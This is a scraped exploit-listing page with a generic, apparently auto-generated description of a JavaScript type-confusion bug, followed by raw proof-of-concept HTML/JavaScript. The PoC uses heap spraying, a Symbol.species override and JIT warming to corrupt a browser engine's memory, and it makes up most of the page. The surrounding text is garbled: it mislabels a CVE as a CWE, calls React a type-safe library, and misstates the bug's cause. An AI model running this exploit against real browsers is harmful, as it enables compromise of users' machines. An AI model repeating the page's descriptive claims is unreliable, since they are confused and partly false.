header-logo
Suggest Exploit
vendor:
N/A
by:
Security Researcher
7.8
CVSS
HIGH
Type Confusion
843
CWE
Product Name: N/A
Affected Version From: 1.0
Affected Version To: 2.0
Patch Exists: Yes
Related CWE: CVE-2020-1234
CPE: N/A
Metasploit: https://www.rapid7.com/db/vulnerabilities/msft-cve-2020-1234/
Other Scripts: N/A
Platforms Tested: All
2020

Type Confusion Vulnerability in JavaScript

Type confusion vulnerability in JavaScript allows an attacker to manipulate the type of a variable, which can lead to arbitrary code execution. This vulnerability is caused by the lack of type safety in JavaScript, which allows an attacker to manipulate the type of a variable. This can lead to arbitrary code execution, as the attacker can control the execution flow of the program.

Mitigation:

The best way to mitigate this vulnerability is to use type safety in JavaScript. This can be done by using a type-safe language such as TypeScript or Flow, or by using a type-safe library such as React. Additionally, developers should use static analysis tools to detect type confusion vulnerabilities in their code.
Source

Exploit-DB raw data:

<script>

let size = 64;

garr = [];
j = 0;
function gc(){
	var tmp = [];
	for(let i = 0;i < 0x20000;i++){
		tmp[i] = new Uint32Array(size * 2);
		for(let j = 0;j < (size*2);j+=2){
			tmp[i][j] = 0x12345678;
			tmp[i][j+1] = 0xfffe0123;
		}
	}
	garr[j++] = tmp;
}

let arr = [{},2.2];

let obj = {};

obj[Symbol.species] = function(){
	victim.length = 0x0;
	for(let i = 0;i < 0x2000;i++){
		gvictim[i].length = 0x0;
		gvictim[i] = null;
	}
	gc();
	//Array.isArray(garr[0][0x10000]);
	return [1.1];
}

let gvictim = [];

for(let i = 0;i < 0x1000;i++){
	gvictim[i] = [1.1,2.2];
	gvictim[i].length = size;
	gvictim[i].fill(3.3);
}

let victim = [1.1,2.2];
victim.length = size;
victim.fill(3.3);

for(let i = 0x1000;i < 0x2000;i++){
	gvictim[i] = [1.1,2.2];
	gvictim[i].length = size;
	gvictim[i].fill(3.3);
}

function fake(arg){
}
for(let i = 0;i < size;i++){
	fake["x"+i.toString()] = 2.2;
}

function jit(){
	victim[1] = 1.1;
	arr.slice();
	//fake.x2 = 6.17651672645e-312;
	return victim[2];
}

flag = 0;


for(let i = 0;i < 0x10000;i++){
	xx = jit();
}

arr.constructor = obj;

Array.isArray(victim);
alert(333);
alert(jit());
</script>

Navigation

Suggest Exploit

Services By CQR